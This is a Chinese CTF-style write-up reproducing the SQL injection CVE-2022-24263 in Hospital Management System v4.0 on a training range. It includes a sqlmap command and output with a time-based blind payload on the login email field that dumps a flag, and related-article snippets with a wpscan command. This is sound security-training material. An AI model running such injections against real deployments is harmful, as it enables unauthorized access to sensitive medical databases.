Hospital Management System v4.0 SQL 注入漏洞(CVE-2022-24263)

前言

CVE-2022-24263 是一个影响 Hospital Management System (HMS) v4.0 的 SQL 注入漏洞。这个漏洞允许攻击者通过注入恶意 SQL 代码来获取数据库的敏感信息,甚至可能控制整个数据库。以下是对这个漏洞的详细介绍:

漏洞描述

在 Hospital Management System v4.0 中,存在多个输入字段没有正确过滤用户输入,导致 SQL 注入漏洞。攻击者可以通过构造特定的 SQL 查询,将恶意代码注入到系统中,进而访问或修改数据库中的数据。

影响范围

任何运行 Hospital Management System v4.0 的系统都可能受到此漏洞的影响。如果系统没有应用适当的安全更新或修复,攻击者可以利用这个漏洞对数据库进行未授权的访问。

漏洞利用

利用这个漏洞的一个常见方法是通过登录表单或其他用户输入点注入恶意 SQL 代码。例如,攻击者可能会在用户名或密码字段中输入特殊构造的 SQL 语句,从而绕过身份验证或执行其他数据库操作。

修复措施

要修复此漏洞,开发者应确保所有用户输入都经过严格的验证和过滤,特别是在生成 SQL 查询时。此外,采用预编译语句(prepared statements)和参数化查询可以有效防止 SQL 注入攻击。

春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:

实战演练:

提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。

漏洞复现:

用户可以通过平台对已知的安全漏洞进行复现,了解漏洞的产生原因、利用方法和修复措施。
通过实战操作,帮助用户掌握漏洞利用和防护的技能。

教学培训:

提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。
包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。

竞赛与评测:

定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。
提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。

资源共享:

平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。
用户可以在社区中分享经验和资源,互相交流和学习。

春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。

介绍

Hospital Management System (HMS) v4.0 是一款综合性的医疗管理软件,专为医疗机构设计,以简化和优化医院的管理流程和操作。以下是 HMS v4.0 的主要特点和功能:

主要特点

  1. 患者管理

    • 记录和管理患者的详细信息,包括基本信息、病历、就诊记录和治疗方案。
    • 支持患者的入院、出院和转院管理。
  2. 预约管理

    • 提供便捷的预约系统,患者可以在线预约医生,减少排队时间,提高就诊效率。
    • 医生可以查看和管理预约记录,安排和调整日程。
  3. 医生管理

    • 管理医生的详细信息和工作安排。
    • 记录医生的就诊记录和手术记录,便于绩效考核和工作评估。
  4. 药品管理

    • 记录和管理医院药品库存,包括药品的采购、库存、发放和使用情况。
    • 提供药品使用报告和库存预警,确保药品供应的及时和安全。
  5. 财务管理

    • 管理医院的财务收支,包括挂号费、诊疗费、药品费和其他费用。
    • 提供详细的财务报表和统计分析,帮助医院进行财务管理和决策。
  6. 病房管理

    • 管理病房和床位信息,包括病房的分配、使用和维护。
    • 提供病房的实时状态,便于医院进行资源调配和管理。
  7. 实验室管理

    • 管理实验室的检验项目和结果,记录患者的检验报告。
    • 提供检验数据的统计分析,辅助医生进行诊断和治疗。
  8. 报告生成

    • 生成各种管理报告和统计分析,包括患者报告、财务报告、药品使用报告等。
    • 支持自定义报表,满足不同用户的需求。

应用场景

Hospital Management System v4.0 适用于各种类型和规模的医疗机构,包括:

  • 综合医院:大中型综合医院,可以利用 HMS 的全面功能,提升医院的管理效率和服务质量。
  • 专科医院:专注于某一专科的医院,可以根据需要定制 HMS 的模块,专注于特定领域的管理。
  • 诊所和门诊部:小型医疗机构可以利用 HMS 的核心功能,提高日常运营的效率。

优势

  1. 提高管理效率:通过信息化管理,减少人工操作,提高工作效率和准确性。
  2. 优化患者体验:提供便捷的预约和就诊服务,缩短患者等待时间,提升患者满意度。
  3. 增强数据安全:通过权限控制和数据加密,保护患者隐私和医院数据的安全。
  4. 支持决策分析:通过全面的统计分析和报表生成,辅助医院管理层进行决策。

总结

Hospital Management System v4.0 是一款功能强大、操作简便的医疗管理软件,旨在通过信息化手段,优化医院的管理流程,提高工作效率和服务质量。它适用于各类医疗机构,是现代医院管理的理想选择。

漏洞复现

打开靶场

进入靶场是这个页面

网上查找漏洞相关信息

点击登录

可以看到有一个邮箱参数及密码,这里应该就是漏洞了 

打开 BurpSuite 拦截抓包

复制值到 txt 文件中,使用 SQLMap 开跑

省略爆库爆表过程……(太慢了)

D:\CVE\sqlmap-master>python sqlmap.py -r sqlmap-post.txt -D "ctf" -T "flag" -C "flag" --dump
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.6.17#dev}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:17:15 /2024-07-03/

[22:17:15] [INFO] parsing HTTP request from 'sqlmap-post.txt'
[22:17:16] [INFO] resuming back-end DBMS 'mysql'
[22:17:16] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=a4p7mmiqgl2...ugmsr9eago'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=666@qq.com' AND (SELECT 1648 FROM (SELECT(SLEEP(5)))CpfC) AND 'ThOA'='ThOA&password2=123&patsub=Login
---
[22:17:17] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.20, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[22:17:17] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'ctf'
[22:17:17] [INFO] fetching number of column(s) 'flag' entries for table 'flag' in database 'ctf'
[22:17:17] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[22:17:20] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
1
[22:17:41] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{d3ca3cd0-568f-48ff-bc52-421bffb4a
[22:29:51] [ERROR] invalid character detected. retrying..
ba6}
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{d3ca3cd0-568f-48ff-bc52-421bffb4aba6} |
+--------------------------------------------+

[22:31:04] [INFO] table 'ctf.flag' dumped to CSV file 'C:\Users\ydd33\AppData\Local\sqlmap\output\eci-2zeculqw9h9wqm1tjdmm.cloudeci1.ichunqiu.com\dump\ctf\flag.csv'
[22:31:04] [INFO] fetched data logged to text files under 'C:\Users\ydd33\AppData\Local\sqlmap\output\eci-2zeculqw9h9wqm1tjdmm.cloudeci1.ichunqiu.com'

[*] ending @ 22:31:04 /2024-07-03/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/785232.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

使用Keil 点亮LED灯 F103ZET6

1.新建项目 不截图了 2.startup_stm32f10x_hd.s Keil\Packs\Keil\STM32F1xx_DFP\2.2.0\Device\Source\ARM 搜索startup_stm32f10x_hd.s 复制到项目路径,双击Source Group 1 3.项目文件夹新建stm32f10x.h, 新建文件main.c #include "stm32f10x…

OS-HACKNOS-2.1

确定靶机IP地址 扫描靶机开放端口信息 目录扫描 访问后发现个邮箱地址 尝试爆破二级目录 确定为wordpress站 利用wpscan进行漏洞扫描 #扫描所有插件 wpscan --url http://192.168.0.2/tsweb -e ap 发现存在漏洞插件 cat /usr/share/exploitdb/exploits/php/webapps/46537.txt…

Camera Raw:裁剪

Camera Raw 的裁剪 Crop面板提供了裁剪、旋转、翻转、拉直照片等功能,通过它们可以更精确地调整照片的视角和范围,以达到最佳二次构图的视觉效果。 快捷键:C ◆ ◆ ◆ 使用方法与技巧 1、使用预设 选择多种裁剪预设(如 1:1、16:…

前端传到后端的data数组中有些属性值为空

将前端输入框中的值全部放入data中传入后端,但是在后端查看发现后端接收到的数据有些属性值为空。 第一种情况:只有第一个属性为空,其余属性接收正常 可能原因:后端用来接收的 比如前端发送数据: 实际上前端发送的数…

防火墙详解(USG6000V)

0、防火墙组网模式 防火墙能够工作在三种模式下分别是路由模式、透明模式、旁路检测模式、混合模式 0.1、路由模式 路由模式:防火墙全部以第三层对外连接,即接口具有IP 地址。一般都用在防火墙是边界的场景下 防火墙需要的部署/配置: 接…

【Excel】 批量跳转图片

目录标题 1. CtrlA全选图片 → 右键 → 大小和属性2. 取消 锁定纵横比 → 跳转高度宽度 → 关闭窗口3. 最后一图拉到最后一单元格 → Alt吸附边框![](https://i-blog.csdnimg.cn/direct/d56ac1f41af54d54bb8c68339b558dd1.png)4. CtrlA全选图片 → 对齐 → 左对齐 → 纵向分布!…

C++初探究

概述 C可以追溯到1979年,C之父Bjarne Stroustrup在在使用C语言研发工作时发现C语言的不足,并想要将其改进,到1983年,Bjarne Stroustrup在C语言的基础上添加了面向对象编程的特性,设计出了C的雏形。 网址推荐 C官方文…

Java面试八股之MySQL主从复制机制简述

MySQL主从复制机制简述 MySQL的主从复制机制是一种数据复制方案,用于在多个服务器之间同步数据。此机制允许从一个服务器(主服务器)到一个或多个其他服务器(从服务器)进行数据的复制,从而增强数据冗余、提…

HTTP 请求走私漏洞详解

超详细的HTTP请求走私漏洞教程,看完还不会你来找我。 1. 简介 HTTP请求走私漏洞(HTTP Request Smuggling)发生在前端服务器(也称代理服务器,一般会进行身份验证或访问控制)和后端服务器在解析HTTP请求时&…

YASKAWA安川Σ-V系列伺服驱动器AC设计维护手侧

YASKAWA安川Σ-V系列伺服驱动器AC设计维护手侧

C#——序列化和反序列化概念

(1)序列化 在编程中,序列化是指将对象转换为可存储或传输的格式,例如将对象转换为 JSON 字符串或字节流。 (2)反序列化 在编程中,反序列化则是将存储或传输的数据转换回对象的过程。 序列化和反序列化经常用于数据的持久化、数据交换以及…

JAVA基础-----包装类,自动装箱、拆箱

一、包装类: Java中的数据类型总体上分为基本数据类型和引用数据类型。引用类型的数据可以通过对象的属性和方法来进行操作,但对于基本数据类型的数据,我们能不能像操作对象那样来操作呢?为了实现这个目标,Java为8种基…

WebOffice在线编微软Offfice,并以二进制流的形式打开Word文档

在日常办公场景中,我们经常会遇到这种场景:我们的合同管理系统的各种Word,excel,ppt数据都是以二进制数组的形式存储在数据库中,如何从数据库中读取二进制数据,以二进制数据作为参数,然后加载到浏览器的Office窗口&…

华为HCIP Datacom H12-821 卷30

1.单选题 以下关于OSPF协议报文说法错误的是? A、OSPF报文采用UDP报文封装并且端口号是89 B、OSPF所有报文的头部格式相同 C、OSPF协议使用五种报文完成路由信息的传递 D、OSPF所有报文头部都携带了Router-ID字段 正确答案:A 解析: OSPF用IP报…

每日一练全新考试模式解锁|考试升级

🙋频繁有小伙伴咨询:我想举办一场历时一个月的答题活动,学生可以每天打开答题,活动完结后可以导出每天的答题成绩 此前我们都会让小伙伴创建30场考试,然后使用批量分享功能组合起来,对外分享一个链接就可以…

强化学习编程实战-2马尔可夫决策过程

2.1 从多臂赌博机到马尔可夫决策过程 如图2-1,图中A为多臂赌博机,B为一堆鸳鸯,其中左上角为雄性鸳鸯,右上角为雌性鸳鸯,B展示的任务是雄性鸳鸯绕过障碍物找到词性鸳鸯。跟多臂赌博机不同的是,雄性鸳鸯经过一…

提升爬虫OCR识别率:解决嘈杂验证码问题

引言 在数据抓取和网络爬虫技术中,验证码是常见的防爬措施,特别是嘈杂文本验证码。处理嘈杂验证码是一个复杂的问题,因为这些验证码故意设计成难以自动识别。本文将介绍如何使用OCR技术提高爬虫识别嘈杂验证码的准确率,并结合实际…

小米订单锐减背后的挑战与应对之道

近期,富士康印度子公司Bharat FIH面临高管离职、工厂关闭的困境,其背后原因之一是小米订单的显著下滑,据报道,这一降幅高达70%。这一现象不仅反映了富士康在印度市场的艰难处境,也揭示了小米在全球智能手机市场面临的挑…

C++ | Leetcode C++题解之第22题完全二叉树的节点个数

题目&#xff1a; 题解&#xff1a; class Solution { public:int countNodes(TreeNode* root) {if (root nullptr) {return 0;}int level 0;TreeNode* node root;while (node->left ! nullptr) {level;node node->left;}int low 1 << level, high (1 <&…

部署windows-exporter

一、安装 windows-exporter源码 下载对应版本 在windows中使用二进制方式部署 安装好之后&#xff0c;打开 http://127.0.0.1:9182/metrics 二、接入prometheus 1、通过静态文件配置加入 scrape_configs:# The job name is added as a label job<job_name> to any …